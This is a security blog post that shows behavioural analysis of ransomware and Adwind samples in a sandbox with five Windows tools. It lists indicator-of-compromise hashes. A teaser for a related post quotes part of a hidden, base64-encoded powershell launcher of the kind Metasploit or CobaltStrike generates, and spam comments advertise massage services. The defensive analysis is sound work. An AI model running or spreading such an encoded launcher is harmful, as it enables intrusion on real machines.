Skip to main content

Five awesome tools to perform behavioural analysis of a malware

This post explains about five awesome tools to perform behavioural analysis of a malware. These tools are really handy to perform a quick behavioural analysis to understand the characteristics of malware specimen. The main objective of behavioural analysis is to pull out indicators of compromise to defend and detect proactively.


  1. Process Hacker (
  2. Process Monitor (ProcMon) (
  3. CaptureBat (
  4. Microsoft Network Monitor (
  5. Autoruns (
  • You are dealing with real malware samples
  • Don’t expose them to internal networks or internet
  • Analyze them in a controlled environments (sandboxes)
  • We are not responsible for any consequences of damage if you fail to obey the rules
A windows 7 virtual machine was setup with above mentioned tools. Ensured that a clean state of windows 7 with all tools was taken as a snapshot. The above mentioned tools were explained with various malware specimen. Find below hash values for malware used in this analysis and run all tools in background while executing malware 


Process hacker
The malware was executed while process hacker was running in the background. 

It was interesting to see the description for the malware. We could poke around the memory section of the malware later. 

The initial process was terminated and new process was created with some strange executable and the location of file could also be found by looking at the properties of the process. It's always suggested to dump the memory of the infected system so that all the terminated processes can be identified and also made a timeline analysis of all processes. Looking at the properties of the newly created process
We could see many interesting strings in process memory related to ransomware and also a help instructions file for decryption process. We could also identify an IP address within process memory strings  and it's recommended to filter using regular expression for IP addresses 


We can also dump entire process memory strings to a text file and search offline for IP addresses or anything of interest using filters. 

Process Monitor 
Upon running the process monitor in process create filter mode while the malware was executed. Using process monitor, we could identify all newly created processes and also all command line arguments for those processes 

It was identified that the malware stops all critical services and delete all volume shadow copies on the system and then ran the dropped binary to encrypt all files. The location of newly created process was also identified as Users Appdata folder. 
It was observed that notepad process was started to show the dropped help instructions file 

CaptureBat was used to capture all dropped files and also the network traffic. Easy to use tool that could also capture all modified and newly created files on disk.
The logs of CaptureBat 
Below were the dropped files on disk 
Further analysis (reverse engineering or dynamic analysis)of these files could bring better understanding of the malware. These file hashes could be used as IoC or signatures in malware detection

Adwind Sample Hash: 728f71096842b505ddaaa1b9084e8b1950d9eef6831f44a9a88ded61e5cdcab7

The below were the dropped files on disk by Adwind malware ( captured by CaptureBat) 
Dropped dll can be seen above screenshot 
Dropped VB scripts on disk 

Adwind Indicators of compromise ( hash value of all dropped files) 
  • 0b7b52302c8c5df59d960dd97e3abdaf
  • 781fb531354d6f291f1ccab48da6d39f
  • 781fb531354d6f291f1ccab48da6d39f
  • a4c133612fcb6e3e26564594661c3338
  • a32c109297ed1ca155598cd295c26611
  • 3bdfd33017806b85949b6faa7d4b98e4

Microsoft Network Monitor 
Microsoft Network Monitor should be run with admin privileges to capture all network traffic. The beauty of this tool is that it can identify which process is establishing connections with remote hosts. Wireshark can also be used but it's limited to network traffic and it can not associate a running process with it's network connection 
It was observed that newly created process connected to an external entity 
We could also dump and save entire traffic as pcap file for further analysis

Microsoft windows has many Auto Start Execution Points (ASEPs) through which the persistence can be achieved. This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login, and when you start various built-in Windows applications like Internet Explorer, Explorer and media players. These programs and drivers include ones in your startup folder, Run, RunOnce, and other Registry keys. Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more. Autoruns goes way beyond other autostart utilities.
As shown above, the malware made an entry into registry Run keys to maintain its persistence 
Leverage inbuilt virustotal scanning for executable images located in autostart locations. 

This is just an explanatory post to explain how to use these tools for quick and effective behavioural analysis of a malware :) 


  1. Mohegan Sun Pocono - JT Hub
    Hotel Details. The property offers 3,590 춘천 출장마사지 rooms and suites. The property is located in Wilkes-Barre, 구리 출장안마 PA. The 경상남도 출장샵 hotel has a 서울특별 출장샵 number of amenities including a casino, 동두천 출장샵

  2. I enjoyed reading this, thanks for the effort. Access this profile Browser games. CPS browser games offer quick bursts of stimulating click test entertainment.


Post a Comment

Popular posts from this blog

Memory Analysis of WannaCry Ransomware

Introduction  This post explains the memory dump analysis of WannaCry infected system using volatility (An open source memory forensics framework) and other open source tools. It doesn't cover the analysis of initial infection vector, propagation and recovery of infected system. The objective is to leverage memory forensic analysis to uncover and extract Indicators of Compromise (IoC)  WannaCry  WannaCry (or WannaCrypt, WanaCrypt0r 2.0, Wanna Decryptor) is a ransomware program targeting the Microsoft Windows operating system. On Friday, 12 May 2017, a large cyber-attack using it was launched, infecting more than 230,000 computers in 150 countries, demanding ransom payments in the cryptocurrency bitcoin in 28 languages.The attack has been described by Europol as unprecedented in scale. Discalimer You are dealing with real malware samples Don’t expose them to internal networks or internet Analyze them in a controlle

Decoding Metasploit and CobaltStrike shells

Introduction This post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike ). It leverages CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg  emulator to get the IP address of C2 or an adversary ShellCode Here we have the encoded powershell command  powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAH

Memory dump analysis of Donny's System

Introduction  This post solves the mystery of Donny's System   and outlines how to utilize memory forensics methodology to uncover artifacts from memory dumps Tools: Volatility, Yara  & Windows Powershell Analysis Six-step investigative methodology by SANS Identify rogue processes  Analyze process DLLs and handles   Review network artifacts  Look for evidence of code injection  Check for signs of rootkit Dump suspicious processes and drivers  Run volatility  imageinfo plugin   to identify profile  PS C:\volatility> .\vol.exe -f .\unknown.vmem imageinfo Run Volatility  pslist plugin to see active running processes PS C:\volatility> .\vol.exe -f .\unknown.vmem --profile=WinXPSP3x86 pslist Just to remind that all process creation and termination timings are specified in UTC. Ensure to change them to system timezone while correlating the events with other sources of evidence game.exe clearly looks suspicious as it ran and exit in a short span o